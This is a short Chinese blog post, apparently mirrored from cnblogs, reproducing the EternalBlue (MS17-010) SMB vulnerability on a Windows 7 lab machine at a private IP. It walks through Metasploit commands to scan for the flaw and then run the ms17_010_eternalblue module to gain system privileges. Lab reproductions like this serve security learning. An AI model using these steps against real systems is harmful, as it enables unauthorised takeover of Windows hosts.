zoukankan      html  css  js  c++  java
  • 永恒之蓝 MS17-010漏洞复现

    永恒之蓝 MS17-010漏洞复现

    一:简介 

    永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

    永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。

    二:复现

    目标IP:192.168.23.174

    这个靶机是我前几个月网上下载的,普通的win7镜像,完全没想到居然也有永恒之蓝漏洞,本来想测试一下有没有,居然真的有

    第一步:

    打开kali,输入msfconsole 打开msf工具

    第二步:search  ms17_010  搜索这个漏洞的所有模块

    scanner 表示扫描探测,我们可以先探测目标有没有这个漏洞

    第三步:利用上面1这个模块

    输入 use auxiliary/scanner/smb/smb_ms17_010

    设置目标ip: eset RHOSTS 192.168.23.174

    开始探测:exploit

     表示很有可能有这么漏洞:

     

     第四步:

    back 返回上一级

    search ms17_010 

    use exploit/windows/smb/ms17_010_eternalblue   //使用攻击模块攻击

    average 表示优先推荐使用

    设置目标ip,和上面扫描一样

    set RHOSTS ip

    show options  //查看选项

     

     exploit  //开始攻击

    攻击成功拿到系统权限

    注意: 这个实验有时候会导致目标主机的重启。

  • 相关阅读:
    使用CoreData [3]
    使用CoreData [2]
    使用CoreData [1]
    [翻译] CRPixellatedView-用CIPixellate滤镜动态渲染UIView
    简易使用UILabel的富文本
    [翻译] OrigamiEngine
    [翻译] DoActionSheet
    解决tableView中cell动态加载控件的重用问题
    ARC中用代码检测一个对象有没有释放掉
    HTTP请求中浏览器的缓存机制
  • 原文地址:https://www.cnblogs.com/trevain/p/13972549.html
Copyright © 2011-2022 走看看